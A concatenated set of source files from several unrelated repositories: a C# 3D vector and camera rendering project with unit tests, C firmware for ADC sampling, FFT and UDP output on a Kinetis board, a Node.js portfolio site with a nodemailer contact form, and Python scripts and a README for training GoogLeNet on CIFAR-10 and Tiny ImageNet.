void Enlarge(float factor) { float x = GetX() * factor; float y = GetY() * factor; float z = GetZ() * factor; points[1].SetX(x); points[1].SetY(y); points[1].SetZ(z); } /* * Simplifies vectors */ public Vector GetSimplified() { var x = GetX(); var y = GetY(); var z = GetZ(); while (true) { if (x % 2 == 0 && y % 2 == 0 && z % 2 == 0) { x /= 2; y /= 2; z /= 2; } else { break; } } var p = new Point(points[0].GetX() + x, points[0].GetY() + y, points[0].GetZ() + z); return new Vector(points[0], p); } /* * Calculates crossproduct of vectors */ public Vector GetCrossProduct(Vector v) { var x = GetY() * v.GetZ() - v.GetY() * GetZ(); var y = v.GetX() * GetZ() - GetX() * v.GetZ(); var z = GetX() * v.GetY() - v.GetX() * GetY(); var realX = points[0].GetX() + x; var realY = points[0].GetY() + y; var realZ = points[0].GetZ() + z; var point = new Point(realX, realY, realZ); return new Vector(points[0], point); } /* * Calculates inproduct of vectors */ public float GetInproduct(Vector v) { return GetX() * v.GetX() + GetY() * v.GetY() + GetZ() * v.GetZ(); } /* * Moves the vector based on the directional vector */ public void Move(float speed, Vector Direction) { Direction.Enlarge(speed); GetPoint(0).SetX(GetPoint(0).GetX() + Direction.GetX()); GetPoint(1).SetX(GetPoint(1).GetX() + Direction.GetX()); GetPoint(0).SetY(GetPoint(0).GetY() + Direction.GetY()); GetPoint(1).SetY(GetPoint(1).GetY() + Direction.GetY()); } /* * Prints the vector */ public void Print() { Console.WriteLine("Vector x: " + GetX() + ", y:" + GetY() + ", z: " + GetZ() + ", Length: " + GetLength()); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Runtime.InteropServices.ComTypes; using System.Text; using System.Threading.Tasks; namespace LINAL { class Camera { private Vector _eye; private Vector _lookAt; private Vector _up; private Vector _x, _y, _z; /* * Initializes the camera and creates the vectors for the first time */ public Camera() { SetEye(0, 200, 200); 
SetLookAtPoint(0, 0, 0); SetUp(0, 1, 0); SetVectors(); } /* * Initializes the Eye position */ public void SetEye(float x, float y, float z) { _eye = (new Point(x, y, z)).MakeVector(); _eye.SetHelp(1); } /* * Initializes the LookAt position */ public void SetLookAtPoint(float x, float y, float z) { _lookAt = (new Point(x, y, z)).MakeVector(); _lookAt.SetHelp(1); } /* * Initializes the Up position */ public void SetUp(float x, float y, float z) { _up = (new Point(x, y, z)).MakeVector(); _up.SetHelp(1); } /* * Rebuilds the camera vectors */ public void SetVectors() { _z = _eye.Subtract(_lookAt); _y = _up; _x = _y.GetCrossProduct(_z); _y = _z.GetCrossProduct(_x); _x.MakeUnitVector(); _y.MakeUnitVector(); _z.MakeUnitVector(); } /* * Returns the camera as a matrix. Uses all updated values */ public Matrix Get() { Matrix cameraMatrix = new Matrix(4, 4); float[,] data = { { _x.GetX(), _x.GetY(), _x.GetZ(), -_x.GetInproduct(_eye) }, { _y.GetX(), _y.GetY(), _y.GetZ(), -_y.GetInproduct(_eye) }, { _z.GetX(), _z.GetY(), _z.GetZ(), -_z.GetInproduct(_eye) }, { 0, 0, 0, 1 } }; cameraMatrix.SetData(data); return cameraMatrix; } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; using System.Windows; using System.Windows.Controls; using System.Windows.Data; using System.Windows.Documents; using System.Windows.Input; using System.Windows.Media; using System.Windows.Media.Animation; using System.Windows.Media.Imaging; using System.Windows.Navigation; using System.Windows.Shapes; using System.Windows.Threading; namespace LINAL { /// <summary> /// floateraction logic for MainWindow.xaml /// </summary> public partial class MainWindow : Window { private Camera camera; private Perspective perspective; private List<Matrix> weergaveVectoren; private Dictionary<string, Matrix> wereldVectoren; private Point r1, r2; private DispatcherTimer t = new DispatcherTimer(); /* * Initializes the Cube, 
Player, Camera, Perspective and the dispatchtimer for the cube. */ public MainWindow() { InitializeComponent(); weergaveVectoren = new List<Matrix>(); wereldVectoren = new Dictionary<string, Matrix>(); camera = new Camera(); perspective = new Perspective(1, 150); CreatePlayer(); CreateCube(); t.Tick += ScaleCube; t.Interval = new TimeSpan(0, 0, 0, 0, 400); t.Start(); } /* * Scales the cube every 400 milliseconds. Stops when size reaches 1/3 of screensize */ void ScaleCube(object sender, EventArgs e) { wereldVectoren["Cube"].Scale(1.1f, 1.1f, 1.1f); Draw(); Console.WriteLine(Math.Abs(wereldVectoren["Cube"].GetWidth()) + " - " + perspective.GetScreenSize()); if (Math.Abs(wereldVectoren["Cube"].GetWidth()) >= perspective.GetScreenSize()) t.Stop(); } /* * Create the player object and add it to the world vectors */ public void CreatePlayer() { Point A = new Point(-80, 0, 195); Point B = new Point(0, 0, 195); Point C = new Point(-80, 0, 179); Point D = new Point(0, 0, 179); Point E = new Point(-80, 16, 195); Point F = new Point(0, 16, 195); Point G = new Point(-80, 16, 179); Point H = new Point(0, 16, 179); Vector AB = new Vector(A, B); Vector AC = new Vector(A, C); Vector BD = new Vector(B, D); Vector CD = new Vector(C, D); Vector AE = new Vector(A, E); Vector BF = new Vector(B, F); Vector DH = new Vector(D, H); Vector CG = new Vector(C, G); Vector EF = new Vector(E, F); Vector EG = new Vector(E, G); Vector FH = new Vector(F, H); Vector GH = new Vector(G, H); Vector[] x = { AB, AC, BD, CD, AE, BF, DH, CG, EF, EG, FH, GH }; Matrix punten = new Matrix(4, x.Length*2); int i = 0; int place = 0; while (i < punten.GetColumns()/2) { punten.AddVector(place, x[i]); i++; place += 2; } wereldVectoren.Add("Player", punten); SetPlayerMiddle(); } /* * Calculate the middle of the player */ private void SetPlayerMiddle() { r1 = wereldVectoren["Player"].GetMiddle(); r1.SetZ(0); r2 = wereldVectoren["Player"].GetMiddle(); } /* * Create the cube that grows at the horizon */ private void 
CreateCube() { Point A = new Point(-1, -1, 1); Point B = new Point(1, -1, 1); Point C = new Point(-1, -1, -1); Point D = new Point(1, -1, -1); Point E = new Point(-1, 1, 1); Point F = new Point(1, 1, 1); Point G = new Point(-1, 1, -1); Point H = new Point(1, 1, -1); Vector AB = new Vector(A, B); Vector AC = new Vector(A, C); Vector BD = new Vector(B, D); Vector CD = new Vector(C, D); Vector AE = new Vector(A, E); Vector BF = new Vector(B, F); Vector DH = new Vector(D, H); Vector CG = new Vector(C, G); Vector EF = new Vector(E, F); Vector EG = new Vector(E, G); Vector FH = new Vector(F, H); Vector GH = new Vector(G, H); Vector[] x = { AB, AC, BD, CD, AE, BF, DH, CG, EF, EG, FH, GH }; Matrix punten = new Matrix(4, x.Length * 2); int i = 0; int place = 0; while (i < punten.GetColumns() / 2) { punten.AddVector(place, x[i]); i++; place += 2; } wereldVectoren.Add("Cube", punten); } /* * Creates the view vectors. Camera, Perspective & Recalculation */ private void CreateViewVectors() { weergaveVectoren.Clear(); foreach (string wereld in wereldVectoren.Keys) { Matrix m = wereldVectoren[wereld]; Matrix wereldVector = perspective.Get(); wereldVector.Multiply(camera.Get()); wereldVector.Multiply(m); for (int column = 0; column < wereldVector.GetColumns(); column++) { float x = wereldVector.Get(0, column); float y = wereldVector.Get(1, column); float z = wereldVector.Get(2, column); float w = wereldVector.Get(3, column); x = (float)((perspective.GetScreenSize() / 2) + ((x + 1) / w) * perspective.GetScreenSize() * 0.5); y = (float)((perspective.GetScreenSize() / 2) + ((y + 1) / w) * perspective.GetScreenSize() * 0.5); z = -z; wereldVector.Set(0, column, x); wereldVector.Set(1, column, y); wereldVector.Set(2, column, z); } weergaveVectoren.Add(wereldVector); } } /* * Draws all view vectors */ private void Draw() { CreateViewVectors(); MyCanvas.Children.Clear(); foreach (Matrix weergave in weergaveVectoren) { for (int column = 0; column < weergave.GetColumns(); column+=2) { if 
(weergave.Get(3, column) <= 0 || weergave.Get(3, column + 1) <= 0) continue; var line = new Line(); line.X1 = weergave.Get(0, column); line.X2 = weergave.Get(0, column + 1); line.Y1 = weergave.Get(1, column); line.Y2 = weergave.Get(1, column + 1); line.StrokeThickness = 2; line.Stroke = Brushes.Blue; MyCanvas.Children.Add(line); } } } /* * Handles all key presses */ private void MainWindow_OnKeyDown(object sender, KeyEventArgs e) { if (e.Key == Key.Q) { wereldVectoren["Player"].Rotate(-10, true, r2, r1); } else if (e.Key == Key.E) { wereldVectoren["Player"].Rotate(10, true, r2, r1); } if (e.Key == Key.Left) { wereldVectoren["Player"].Translate(-10, 0, 0, true); SetPlayerMiddle(); } else if (e.Key == Key.Right) { wereldVectoren["Player"].Translate(10, 0, 0, true); SetPlayerMiddle(); } else if (e.Key == Key.Up) { wereldVectoren["Player"].Translate(0, 0, -10, true); SetPlayerMiddle(); } else if (e.Key == Key.Down) { wereldVectoren["Player"].Translate(0, 0, 10, true); SetPlayerMiddle(); } Draw(); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Security.AccessControl; using System.Text; using System.Threading.Tasks; namespace LINAL { class Perspective { private float _near, _far, _fieldOfView; /* * Creates a new pespective */ public Perspective(float near, float far) { _near = near; _far = far; _fieldOfView = 90; } /* * Sets the field of view */ public void SetFieldOfView(float fieldOfView) { this._fieldOfView = fieldOfView; } /* * Returns the field of view */ public float GetFieldOfView() { return this._fieldOfView; } /* * Sets the far value */ public void SetFar(float far) { this._far = far; } /* * Returns the far value */ public float GetFar() { return this._far; } /* * Sets the near value */ public void SetNear(float near) { this._near = near; } /* * Returns the near value */ public float GetNear() { return this._near; } /* * Calculates the scale based on the fieldofview and the near variable */ public float GetScale() 
{ var rad = GonioFactory.DegreesToRadians(_fieldOfView); return (_near*GonioFactory.GetTrigonometricByRadians(rad*0.5f, Trigonometric.Tangent)); } /* * Returns the Pespective matrix */ public Matrix Get() { Matrix m = new Matrix(4,4); float[,] data = { { GetScale(), 0, 0, 0 }, { 0, GetScale(), 0, 0 }, { 0, 0, -_far/(_far - _near), -1 }, { 0, 0, (-_far*_near)/(_far - _near), 0 } }; m.SetData(data); return m; } /* * Calculates the pespective screensize */ public float GetScreenSize() { var tan = GonioFactory.GetTrigonometricByDegrees(_fieldOfView/2, Trigonometric.Tangent); var halfSize = tan*_far; return halfSize*2; } } } <file_sep>using System; using LINAL; using Microsoft.VisualStudio.TestTools.UnitTesting; namespace LINAL_Test { [TestClass] public class VectorTest { private Point P, Q, S; private Vector PSupport, PQ, PS; [TestInitialize] public void init() { P = new Point(3, -1, 2); Q = new Point(1, 3, 4); S = new Point(2, 3, 2); PSupport = P.MakeVector(); PQ = new Vector(P, Q); PS = new Vector(P, S); } [TestMethod] public void IsDependant() { Assert.AreEqual(false, PQ.IsDependantOf(PS)); } [TestMethod] public void Inproduct() { Assert.AreEqual(18, PQ.GetInproduct(PS)); } [TestMethod] public void CrossProduct() { Vector v = PQ.GetSimplified().GetCrossProduct(PS.GetSimplified()); Assert.AreEqual(-4, v.GetX()); Assert.AreEqual(-1, v.GetY()); Assert.AreEqual(-2, v.GetZ()); } [TestMethod] public void PointInPlane() { Plane p = new Plane(); p.Add(P); p.Add(Q); p.Add(S); p.BuildFormula(); Assert.AreEqual(true, p.IsInPlane(new Point(-2, 13, 5))); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace LINAL { class GonioFactory { /* * Returns the Arctrigonometric of a function, based on degrees */ public static float GetArcTrigonometricByDegrees(float value1, float value2, Trigonometric tri) { float radians = GetArcTrigonometricByRadians(value1, value2, tri); return 
RadiansToDegrees(radians); } /* * Returns the Arctrigonometric of a function, based on radians */ public static float GetArcTrigonometricByRadians(float value1, float value2, Trigonometric tri) { double result = value1 / value2; if(tri == Trigonometric.Sine) return (float)Math.Asin(result); if (tri == Trigonometric.Cosine) return (float)Math.Acos(result); if (tri == Trigonometric.Tangent) return (float)Math.Atan(result); if (tri == Trigonometric.Tangent2) return (float) Math.Atan2(value1,value2); else return (float) Trigonometric.Undefined; } /* * Converts degrees to radians */ public static float DegreesToRadians(float degrees) { return (float)(degrees*(Math.PI/180.0)); } /* * Converts radians to degrees */ public static float RadiansToDegrees(float radians) { return (float)(radians / Math.PI * 180); } /* * Returns the trigonometric of a function, based on radians */ public static float GetTrigonometricByRadians(float radians, Trigonometric tri) { if (tri == Trigonometric.Sine) return (float)Math.Sin(radians); if (tri == Trigonometric.Cosine) return (float)Math.Cos(radians); if (tri == Trigonometric.Tangent) return (float)Math.Tan(radians); else return (float)Trigonometric.Undefined; } /* * Returns the trigonometric of a function, based on degrees */ public static float GetTrigonometricByDegrees(float degrees, Trigonometric tri) { float radians = DegreesToRadians(degrees); return GetTrigonometricByRadians(radians, tri); } } /* * Enumeration for trigonometric functions */ public enum Trigonometric { Undefined = 0, Sine = 1, Cosine = 2, Tangent = 3, Tangent2 = 4 } }
20420ab888452e999203aae08da44a682e58582b
[ "C#" ]
11
C#
Lwra93/LINAL
2ceea5045da3c58e58e0f6561818c6f24e69e90f
7f6360cdad1b86c02c4bec186649f01fb50aaed7
refs/heads/master
<repo_name>AlSilantyev/MK60DN512VLQ10<file_sep>/Radar_2Ch_FFT_UDP.c /** * @file MK60DN512xxx10_Project.c * @brief Application entry point. */ #include <stdio.h> #include <stdlib.h> #include "fsl_enet.h" #include "fsl_phy.h" #include "fsl_sysmpu.h" #include "fsl_adc16.h" #include "fsl_cmp.h" #include "fsl_lptmr.h" #include "board.h" #include "peripherals.h" #include "pin_mux.h" #include "clock_config.h" #include "MK60D10.h" #include "arm_math.h" #include "fsl_debug_console.h" #include "fsl_common.h" #include "UDP_sender.h" /* TODO: insert other include files here. */ void Get_Vector(); void Data_Process(); void Jubula_Event(); /******************************************************************************* * Prototypes ******************************************************************************/ uint16_t TimeToEvent = 50; uint16_t ChanelA[2048]; uint16_t ChanelB[2048]; uint16_t capData[4096]; uint8_t numPack = 8; float32_t Input[2048]; float32_t Output[4096]; uint32_t fftSize = 2048; //1024; uint32_t ifftFlag = 0; uint32_t doBitReverse = 1; arm_rfft_instance_f32 rfft_inst; arm_cfft_radix4_instance_f32 cfft_inst; lptmr_config_t lptmrConfig; #define LPTMR_LED_HANDLER LPTMR0_IRQHandler #define LPTMR_SOURCE_CLOCK CLOCK_GetFreq(kCLOCK_LpoClk) #define LPTMR_USEC_COUNT 200000U cmp_config_t mCmpConfigStruct; cmp_dac_config_t mCmpDacConfigStruct; #define CMP_BASE CMP1 #define CMP_USER_CHANNEL 3U #define CMP_DAC_CHANNEL 1U #define CMP_IRQ_ID CMP1_IRQn #define CMP_IRQ_HANDLER_FUNC CMP1_IRQHandler volatile uint32_t g_CmpFlags = 0U; adc16_config_t adc16_1ConfigStruct; adc16_channel_config_t adc16_1ChannelConfigStruct; #define ADC16_1_BASE ADC1 #define ADC16_1_CHANNEL_GROUP 0U #define ADC16_1_USER_CHANNEL 0U adc16_config_t adc16_0ConfigStruct; adc16_channel_config_t adc16_0ChannelConfigStruct; #define ADC16_0_BASE ADC0 #define ADC16_0_CHANNEL_GROUP 0U #define ADC16_0_USER_CHANNEL 0U /******************************************************************************* * Code 
****************************************************************************/ int main(void) { BOARD_InitBootPins(); BOARD_InitBootClocks(); BOARD_InitBootPeripherals(); BOARD_InitDebugConsole(); SYSMPU_Enable(SYSMPU, false); ENET_Initialization(); //GPIO_SetPinsOutput(PTB, 1u << 4); //GPIO_SetPinsOutput(PTB, 1u << 5); //GPIO_SetPinsOutput(PTB, 1u << 6); GPIO_SetPinsOutput(PTB, 1u << 7); ADC16_GetDefaultConfig(&adc16_1ConfigStruct); adc16_1ConfigStruct.enableHighSpeed = true; adc16_1ConfigStruct.enableLowPower = false; adc16_1ConfigStruct.clockSource = kADC16_ClockSourceAlt0; adc16_1ConfigStruct.enableAsynchronousClock = false; adc16_1ConfigStruct.clockDivider = kADC16_ClockDivider1; adc16_1ConfigStruct.resolution = kADC16_ResolutionDF13Bit; adc16_1ConfigStruct.longSampleMode = kADC16_LongSampleDisabled; adc16_1ConfigStruct.enableContinuousConversion = true; ADC16_Init(ADC16_1_BASE, &adc16_1ConfigStruct); ADC16_EnableHardwareTrigger(ADC16_1_BASE, false); /* Make sure the software trigger is used. */ ADC16_SetHardwareAverage(ADC16_1_BASE, kADC16_HardwareAverageDisabled); adc16_1ChannelConfigStruct.channelNumber = ADC16_1_USER_CHANNEL; adc16_1ChannelConfigStruct.enableDifferentialConversion = true; adc16_1ChannelConfigStruct.enableInterruptOnConversionCompleted = false; ADC16_GetDefaultConfig(&adc16_0ConfigStruct); adc16_0ConfigStruct.enableHighSpeed = true; adc16_0ConfigStruct.enableLowPower = false; adc16_0ConfigStruct.clockSource = kADC16_ClockSourceAlt0; adc16_0ConfigStruct.enableAsynchronousClock = false; adc16_0ConfigStruct.clockDivider = kADC16_ClockDivider1; adc16_0ConfigStruct.resolution = kADC16_ResolutionDF13Bit; adc16_0ConfigStruct.longSampleMode = kADC16_LongSampleDisabled; adc16_0ConfigStruct.enableContinuousConversion = true; ADC16_Init(ADC16_0_BASE, &adc16_0ConfigStruct); ADC16_EnableHardwareTrigger(ADC16_0_BASE, false); /* Make sure the software trigger is used. 
*/ ADC16_SetHardwareAverage(ADC16_0_BASE, kADC16_HardwareAverageDisabled); adc16_0ChannelConfigStruct.channelNumber = ADC16_0_USER_CHANNEL; adc16_0ChannelConfigStruct.enableDifferentialConversion = true; adc16_0ChannelConfigStruct.enableInterruptOnConversionCompleted = false; ADC16_SetChannelConfig(ADC16_1_BASE, ADC16_1_CHANNEL_GROUP, &adc16_1ChannelConfigStruct); ADC16_SetChannelConfig(ADC16_0_BASE, ADC16_0_CHANNEL_GROUP, &adc16_0ChannelConfigStruct); /* Configure LPTMR */ LPTMR_GetDefaultConfig(&lptmrConfig); LPTMR_Init(LPTMR0, &lptmrConfig); LPTMR_SetTimerPeriod(LPTMR0, USEC_TO_COUNT(LPTMR_USEC_COUNT, LPTMR_SOURCE_CLOCK)); LPTMR_EnableInterrupts(LPTMR0, kLPTMR_TimerInterruptEnable); EnableIRQ(LPTMR0_IRQn); /* Configure CMP */ CMP_GetDefaultConfig(&mCmpConfigStruct); CMP_Init(CMP_BASE, &mCmpConfigStruct); mCmpDacConfigStruct.referenceVoltageSource = kCMP_VrefSourceVin2; mCmpDacConfigStruct.DACValue = 32U; CMP_SetDACConfig(CMP_BASE, &mCmpDacConfigStruct); CMP_SetInputChannels(CMP_BASE, CMP_USER_CHANNEL, CMP_DAC_CHANNEL); CMP_EnableInterrupts(CMP_BASE, kCMP_OutputRisingInterruptEnable | kCMP_OutputFallingInterruptEnable); EnableIRQ(CMP1_IRQn); //DEMO_CMP_IRQ_ID); // RFFT initialization arm_rfft_init_f32(&rfft_inst, &cfft_inst, fftSize, ifftFlag, doBitReverse); PRINTF("Hello World\n"); for (uint16_t i=0;i<4096;i++){ capData[i] = i;} LPTMR_StartTimer(LPTMR0); while (1){} return 0 ; } //------------------------- Timer Interrupt ------------------------------------------------- void LPTMR_LED_HANDLER(void) { LPTMR_ClearStatusFlags(LPTMR0, kLPTMR_TimerCompareFlag); if (TimeToEvent > 0) { TimeToEvent --; PRINTF("TimeToEvent %d\n", TimeToEvent); } else if(TimeToEvent == 0) { Jubula_Event(); } __DSB(); __ISB(); } //--------------------------- CMP Interrupt -------------------------------------------------- void CMP_IRQ_HANDLER_FUNC(void) { g_CmpFlags = CMP_GetStatusFlags(CMP_BASE); CMP_ClearStatusFlags(CMP_BASE, kCMP_OutputRisingEventFlag | kCMP_OutputFallingEventFlag); if 
(0U != (g_CmpFlags & kCMP_OutputRisingEventFlag)) { TimeToEvent = 50; Jubula_Event(); } } void Jubula_Event(void) { GPIO_SetPinsOutput(PTB, 1u << 3); Get_Vector(); Data_Process(); Send_UDP(numPack, capData); GPIO_ClearPinsOutput(PTB, 1u << 3); } void Get_Vector() { GPIO_SetPinsOutput(PTB, 1u << 4); for(int i=0;i<2048;i++) { while (0U == (kADC16_ChannelConversionDoneFlag & ADC16_GetChannelStatusFlags(ADC16_1_BASE, ADC16_1_CHANNEL_GROUP))){} ChanelB[i] = ADC16_GetChannelConversionValue(ADC16_1_BASE, ADC16_1_CHANNEL_GROUP); while (0U == (kADC16_ChannelConversionDoneFlag & ADC16_GetChannelStatusFlags(ADC16_0_BASE, ADC16_0_CHANNEL_GROUP))){} //ChanelA[i] = ADC16_GetChannelConversionValue(ADC16_0_BASE, ADC16_0_CHANNEL_GROUP); Input[i] = (float32_t)(ADC16_GetChannelConversionValue(ADC16_0_BASE, ADC16_0_CHANNEL_GROUP) - 2048); } GPIO_ClearPinsOutput(PTB, 1u << 4); } void Data_Process() { GPIO_SetPinsOutput(PTB, 1u << 5); arm_rfft_f32(&rfft_inst, Input, Output); arm_cmplx_mag_f32(Output, Input, fftSize); for (int i=0;i<1024; i++) { capData[i] = (uint16_t)(Input[i]); } /* for (int i=0;i<2048; i++) { Input[i]= (float32_t)(ChanelB[i] -2048); } //arm_rfft_init_f32(&rfft_inst, &cfft_inst, fftSize, ifftFlag, doBitReverse); arm_rfft_f32(&rfft_inst, Input, Output); arm_cmplx_mag_f32(Output, Input, fftSize); for (int i=0;i<1024; i++) { capData[i+1024] = (uint16_t)(Input[i]); } */ GPIO_ClearPinsOutput(PTB, 1u << 5); }
078275b1bf7d84fbf12873c0089d5b2f846f7da7
[ "C" ]
1
C
AlSilantyev/MK60DN512VLQ10
284baf279f1e73093f4d57f17f2701931dd2ef12
073e4094ed79a9bb48937fa875d48b31e5fc08d7
refs/heads/master
<repo_name>sanquinluis/porfoliopage<file_sep>/server.js // Dependencies // =========================================================== var express = require('express'); var bodyParser = require('body-parser'); var path = require('path'); var nodemailer = require('nodemailer'); var smtpTransport = require('nodemailer-smtp-transport'); var http = require('http'); // Sets up the Express App // ============================================================= var app = express(); var PORT = process.env.PORT || 3000; app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: true})); app.use(bodyParser.text()); app.use(bodyParser.json({ type:'application/vnd.api+json' })); // =========================================================== app.use(express.static('public')); app.use(express.static('javascript')); //accessing the Front/html pages // =========================================================== app.get('/', function(req,res){ res.sendFile('html/index.html',{"root":__dirname}); console.log("nodemailer reading" + req.url); }); app.get('/contact', function (req,res) { res.sendFile('html/contact.html', {"root":__dirname}); }); app.get('/aboutme', function (req,res) { res.sendFile('html/about.html', {"root":__dirname}); }); //nodemailer sending mail functions // =========================================================== //sending mail function // sending mail function app.post('/contact', function(req, res){ if(req.body.email == "" || req.body.subject == "") { res.send("Error: Email & Subject should not blank"); return false; } // Sending Emails with SMTP, Configuring SMTP settings var smtpTransport = nodemailer.createTransport({ // host: "smtp.gmail.com", // hostname // secureConnection: true, // use SSL port: 465, // port for secure SMTP auth: { user: '<EMAIL>', pass: '' } }); var mailOptions = { from: "Node Emailer ✔ <<EMAIL>>", // sender address to: req.body.email, // list of receivers subject: "Test Subject ✔", // Subject line text: req.body.message, // 
plaintext body html: "<b>"+req.body.message+"</b>" // html body } smtpTransport.sendMail(mailOptions, function(error, response){ if(error){ res.send("Email could not sent due to error: "+error); }else{ res.send("Email has been sent successfully"); } }); }); // sending email using SMTP configuration //Server is listening. // =========================================================== app.listen(PORT, function(){ console.log("Express is Listening on Portal 3000"); }) <file_sep>/public/javascript/app.js $( document ).ready(function() { // Contact.html to send email using nodemailer $('#send_email').click(function(event){ event.preventDefault(); var name = $('#name').val(); var lastname = $('#lastname').val(); var phone = $('#phone').val(); var email = $('#email').val(); var message = $('#message').val(); console.log(name, lastname, phone, email, message); if (name !== '' && lastname !== '' && phone !== '' && email !== '' && message !== ''){ console.log('post'); $.post('http://localhost:3000/contact', { name: name, lastname: lastname, phone: phone, email: email, message: message } , function(data) { if(data == 'sent') { $('.alert').html('<strong> Success! </strong> Your message has been sent!').addClass('sucess'); } else { $('.alert').html("<strong> Ups! </strong> Your message didn't go through ").addClass('error'); } }); } }); }); <file_sep>/README.md # porfolioPage Using HTML, CSS, Bootstrap, JavaScript and JQuery to build my personal Porfolio Page.
1197ed098177cc2471c4a84b573926168c3dbb50
[ "JavaScript", "Markdown" ]
3
JavaScript
sanquinluis/porfoliopage
986108e7069ad4ba13ebaaff9f78fe065e5e916e
0c9dd7dadefe28f543a8293df546c00438678f9c
refs/heads/master
<repo_name>T-DevH/GoogleNet<file_sep>/README.md # Training GoogleNet from scratch Train MiniGoogLeNet and GoogLeNet on CIFAR-10 and Tiny ImageNet datasets. ## Code objective - Build MiniGoogLeNet and train the network on CIFAR-10 dataset. - Build GoogLeNet and train the network on Tiny ImageNet dataset. ## Packages - Python 3.6 - Cuda 10.2 - cuDNN 7.6.5 - Tensorflow 2.0 - Numpy - scikit-learn 0.22 - imutils 0.5.3 ## Training Template Tuning and optimizing deep-learning networks is more about intuition, practice and patience than a technique. Choosing the correct hyper-parameters and getting a complex network to learn properly can be daunting to developers not well versed in the craft. Getting a deep neural network to converge by selecting the optimal hyper-parameters is a difficult task. This difficulty grows quickly with the complexity of a neural network model. The main questions: (1) Is the learning rate right? (2) The regularization too strong? (3) The dropout keep rate too low? (4) Does the model have sufficient learning capacity? All these questions are difficult to answer. ## GoogleNet In 2014 <NAME> introduced a new Deep CNN architecture named inception in his paper Going Deeper with Convolutions. The author achieved a new state of the art for classification and detection in the ImageNet Large-Scale Visual Recognition Challenge 2014. The main innovation of this architecture is the improved utilization of the computing resources inside the network. The author demonstrated how to increase the depth and width of the network while keeping the computational budget constant. The obvious way to improve the performance of deep neural networks is by increasing their size.This includes both increasing the depth: the number of network levels and increasing the width: the number of units at each level. However, this will lead to two main problems: With GoogleNet the idea is to increase the number of filters by using inception modules. 
While designing this model they have considered the computational budget fixed. Therefore, this model is suitable for embedded systems and mobile and edge applications. Despite 22 layers, the number of parameters used used is 12 time less than AlexNet but its accuracy is significantly better. ![](Figures/Inception.png) ## MiniGoogLeNet on CIFAR-10 The architecture consists of a conv_module, inception_module downsample_module <file_sep>/rank_accuracy.py # USAGE # python rank_accuracy.py # import the necessary packages from config import tiny_imagenet_config as config from NNpipeline.preprocessing import ImageToArrayPreprocessor from NNpipeline.preprocessing import SimplePreprocessor from NNpipeline.preprocessing import MeanPreprocessor from NNpipeline.utils.ranked import rank5_accuracy from NNpipeline.io import HDF5DatasetGenerator from tensorflow.keras.models import load_model import json # load the RGB means for the training set means = json.loads(open(config.DATASET_MEAN).read()) # initialize the image preprocessors sp = SimplePreprocessor(64, 64) mp = MeanPreprocessor(means["R"], means["G"], means["B"]) iap = ImageToArrayPreprocessor() # initialize the testing dataset generator testGen = HDF5DatasetGenerator(config.TEST_HDF5, 64, preprocessors=[sp, mp, iap], classes=config.NUM_CLASSES) # load the pre-trained network print("[INFO] loading model...") model = load_model(config.MODEL_PATH) # make predictions on the testing data print("[INFO] predicting on test data...") predictions = model.predict_generator(testGen.generator(), steps=testGen.numImages // 64, max_queue_size=10) # compute the rank-1 and rank-5 accuracies (rank1, rank5) = rank5_accuracy(predictions, testGen.db["labels"]) print("[INFO] rank-1: {:.2f}%".format(rank1 * 100)) print("[INFO] rank-5: {:.2f}%".format(rank5 * 100)) # close the database testGen.close()<file_sep>/train.py # USAGE # python train.py --checkpoints output/checkpoints # python train.py --checkpoints output/checkpoints --model 
output/checkpoints/epoch_25.hdf5 --start-epoch 25 # set the matplotlib backend so figures can be saved in the background import matplotlib matplotlib.use("Agg") # import the necessary packages from config import tiny_imagenet_config as config from NNpipeline.preprocessing import ImageToArrayPreprocessor from NNpipeline.preprocessing import SimplePreprocessor from NNpipeline.preprocessing import MeanPreprocessor from NNpipeline.callbacks import EpochCheckpoint from NNpipeline.callbacks import TrainingMonitor from NNpipeline.io import HDF5DatasetGenerator from NNpipeline.nn.conv import DeeperGoogLeNet from tensorflow.keras.preprocessing.image import ImageDataGenerator from tensorflow.keras.optimizers import Adam from tensorflow.keras.models import load_model import tensorflow.keras.backend as K import argparse import json # construct the argument parse and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-c", "--checkpoints", required=True, help="path to output checkpoint directory") ap.add_argument("-m", "--model", type=str, help="path to *specific* model checkpoint to load") ap.add_argument("-s", "--start-epoch", type=int, default=0, help="epoch to restart training at") args = vars(ap.parse_args()) # construct the training image generator for data augmentation aug = ImageDataGenerator(rotation_range=18, zoom_range=0.15, width_shift_range=0.2, height_shift_range=0.2, shear_range=0.15, horizontal_flip=True, fill_mode="nearest") # load the RGB means for the training set means = json.loads(open(config.DATASET_MEAN).read()) # initialize the image preprocessors sp = SimplePreprocessor(64, 64) mp = MeanPreprocessor(means["R"], means["G"], means["B"]) iap = ImageToArrayPreprocessor() # initialize the training and validation dataset generators trainGen = HDF5DatasetGenerator(config.TRAIN_HDF5, 64, aug=aug, preprocessors=[sp, mp, iap], classes=config.NUM_CLASSES) valGen = HDF5DatasetGenerator(config.VAL_HDF5, 64, preprocessors=[sp, mp, iap], 
classes=config.NUM_CLASSES) # if there is no specific model checkpoint supplied, then initialize # the network and compile the model if args["model"] is None: print("[INFO] compiling model...") model = DeeperGoogLeNet.build(width=64, height=64, depth=3, classes=config.NUM_CLASSES, reg=0.0005) opt = Adam(1e-3) model.compile(loss="categorical_crossentropy", optimizer=opt, metrics=["accuracy"]) # otherwise, load the checkpoint from disk else: print("[INFO] loading {}...".format(args["model"])) model = load_model(args["model"]) # update the learning rate print("[INFO] old learning rate: {}".format( K.get_value(model.optimizer.lr))) K.set_value(model.optimizer.lr, 1e-5) print("[INFO] new learning rate: {}".format( K.get_value(model.optimizer.lr))) # construct the set of callbacks callbacks = [ EpochCheckpoint(args["checkpoints"], every=5, startAt=args["start_epoch"]), TrainingMonitor(config.FIG_PATH, jsonPath=config.JSON_PATH, startAt=args["start_epoch"])] # train the network model.fit_generator( trainGen.generator(), steps_per_epoch=trainGen.numImages // 64, validation_data=valGen.generator(), validation_steps=valGen.numImages // 64, epochs=10, max_queue_size=10, callbacks=callbacks, verbose=1) # close the databases trainGen.close() valGen.close()
faa00c850c80017b8f3c0863aced01f283fb82d9
[ "Markdown", "Python" ]
3
Markdown
